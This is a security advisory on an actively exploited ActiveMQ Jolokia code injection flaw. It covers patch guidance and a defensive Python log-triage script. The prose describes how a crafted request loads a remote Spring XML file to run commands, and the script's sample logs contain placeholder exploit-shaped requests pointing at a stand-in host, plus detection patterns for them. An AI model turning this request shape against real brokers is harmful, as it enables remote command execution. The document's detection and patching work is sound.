13-year-old Apache ActiveMQ code injection flaw actively exploited - CISA gives federal agencies until April 30 to patch (CVE-2026-34197)
A critical code injection flaw in Apache ActiveMQ Classic is under active exploitation in the wild. CISA added it to the Known Exploited Vulnerabilities catalog on April 16 and gave federal agencies until April 30 to patch. The flaw, tracked as CVE-2026-34197 (CVSS 8.8), has been 'hiding in plain sight' for 13 years, according to Horizon3.ai researcher Naveen Sunkavally. The vulnerable component is the Jolokia JMX-HTTP bridge that the ActiveMQ web console exposes at /api/jolokia/. An attacker sends a crafted HTTP request carrying a malicious discovery URI, which forces the broker to load a Spring XML configuration from a remote location the attacker controls. Because Spring initializes the beans in that configuration before the broker validates it, the attacker's bean definitions run arbitrary OS commands via Runtime.exec(), effectively turning a messaging broker into a remote command runner.

Fortinet FortiGuard Labs telemetry shows exploitation attempts peaking on April 14, 2026, and SAFE Security reports threat actors actively scanning for exposed Jolokia management endpoints.
- Check
- Inventory every ActiveMQ Classic instance in your environment, including brokers embedded in other products. If you are not sure whether you run ActiveMQ, ask the development and platform teams directly: it is embedded in many enterprise messaging pipelines and IoT data flows and will not always show up in a package inventory. The web console, and with it /api/jolokia/, listens on TCP 8161 by default, so a scan for that port is a quick first pass, but a non-default port or a reverse proxy in front of the console will hide it.
- Affected
- Apache ActiveMQ Classic 5.x releases before 5.19.4, and 6.x releases from 6.0.0 up to but not including 6.2.3. The vulnerable component is the Jolokia JMX-HTTP bridge exposed via the web console at /api/jolokia/. Any broker whose web console is reachable from the internet with the default Jolokia configuration is at immediate risk; brokers reachable only from internal networks still need the fix, since exploitation takes a single request from any host that can reach the endpoint.
- Fix
- Upgrade to Apache ActiveMQ 5.19.4 or 6.2.3. If you cannot patch immediately, treat the following as stopgaps, not a fix: block external access to the /api/jolokia/ endpoint at your firewall or reverse proxy, restrict the Jolokia access policy to the specific MBeans you actually need (not the default org.apache.activemq:* wildcard), and require authentication for all management operations. Then review your access logs for the past 30 days for requests to /api/jolokia/ whose URI parameters carry a remote URL or otherwise look out of place; exploitation requires only one successful request, so a single hit matters. Note that Jolokia also accepts operations as JSON in a POST body, which a standard access log does not record, so a clean GET history alone does not prove the broker was not touched; correlate POSTs to the endpoint with proxy logs or packet captures where you have them.
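The version check from the Affected section and the log review from the Fix section, as an added example; this is not code from the article, Horizon3.ai, or the ActiveMQ project. It assumes a version string that contains an x.y.z triple (a jar name such as activemq-broker-5.18.3.jar, or the output of `activemq --version`), and an access log in the NCSA common/combined format that the console's Jetty server writes. The sample log lines, the trusted management host 10.0.0.12, and the MBean and operation names in them are constructed for the example and do not reproduce the real exploit request; the detector flags the shape the advisory describes, a Jolokia request carrying an embedded remote URI, plus POSTs and requests from outside the management set, which the access log alone cannot clear.

```python
"""Triage helpers for the ActiveMQ Classic Jolokia flaw (CVE-2026-34197).

Added example, not code from the article or the ActiveMQ project.
Assumptions: version strings contain an x.y.z triple; the web console's
access log is in NCSA common/combined format. SAMPLE_LOG is constructed.
"""
import re
from urllib.parse import unquote

# First fixed release per major version, as stated in the advisory text.
FIXED = {5: (5, 19, 4), 6: (6, 2, 3)}


def parse_version(text):
    """Return the first x.y.z triple found in text, e.g. from the jar name
    'activemq-broker-5.18.3.jar' or the output of `activemq --version`."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"no x.y.z version found in {text!r}")
    return tuple(int(p) for p in m.groups())


def is_vulnerable(text):
    """True for 5.x < 5.19.4 and 6.x < 6.2.3, False for fixed releases,
    None for a major version the advisory does not cover."""
    version = parse_version(text)
    fixed = FIXED.get(version[0])
    if fixed is None:
        return None
    return version < fixed


# NCSA prefix: host ident user [time] "method target proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
JOLOKIA_PREFIX = "/api/jolokia/"
# A scheme followed by a slash (http://host/..., file:/path) inside the
# request is a resource reference the broker could be told to fetch.
EMBEDDED_URI = re.compile(r"[A-Za-z][A-Za-z0-9+.-]*:/")


def triage_access_log(log_text, trusted_sources=()):
    """Return one finding per Jolokia request that deserves a closer look."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or not m["target"].startswith(JOLOKIA_PREFIX):
            continue
        # Decode twice so a double-encoded %253A%252F%252F (://) is not missed.
        decoded = unquote(unquote(m["target"]))
        reasons = []
        if EMBEDDED_URI.search(decoded):
            reasons.append("embedded URI in Jolokia request")
        if m["method"] == "POST":
            reasons.append("POST body not in access log; recover it from proxy or PCAP")
        if m["ip"] not in trusted_sources:
            reasons.append("source not in trusted management set")
        if reasons:
            findings.append({"ip": m["ip"], "method": m["method"],
                             "target": decoded, "status": int(m["status"]),
                             "reasons": reasons})
    return findings


# Constructed sample; 10.0.0.12 is the assumed management host. The exec
# paths use a placeholder operation name, not the real exploit request.
SAMPLE_LOG = """\
10.0.0.12 - admin [14/Apr/2026:09:01:02 +0000] "GET /api/jolokia/read/java.lang:type=Memory/HeapMemoryUsage HTTP/1.1" 200 412
10.0.0.12 - admin [14/Apr/2026:09:02:10 +0000] "GET /admin/queues.jsp HTTP/1.1" 200 9034
203.0.113.7 - - [14/Apr/2026:09:05:40 +0000] "GET /api/jolokia/exec/org.apache.activemq:type=Broker,brokerName=localhost/exampleOperation/http%3A%2F%2F203.0.113.7%2Fbeans.xml HTTP/1.1" 200 88
203.0.113.7 - - [14/Apr/2026:09:05:41 +0000] "POST /api/jolokia/ HTTP/1.1" 200 156
10.0.0.12 - admin [14/Apr/2026:09:07:00 +0000] "GET /api/jolokia/exec/org.apache.activemq:type=Broker,brokerName=localhost/exampleOperation/http%253A%252F%252F198.51.100.9%252Fbeans.xml HTTP/1.1" 200 88
"""

if __name__ == "__main__":
    for v in ("activemq-broker-5.18.3.jar", "ActiveMQ 6.1.0", "6.2.3", "7.0.0"):
        print(f"{v!r:35} vulnerable={is_vulnerable(v)}")
    for f in triage_access_log(SAMPLE_LOG, trusted_sources={"10.0.0.12"}):
        print(f["ip"], f["method"], f["target"][:70], f["reasons"])
```

The last sample line is the edge case worth keeping in mind: it comes from the trusted management host and would pass a source-based filter, but the double-encoded http:// in the path still marks it for review. Run it against the real access log by reading the file into `triage_access_log` and passing your actual management hosts as `trusted_sources`.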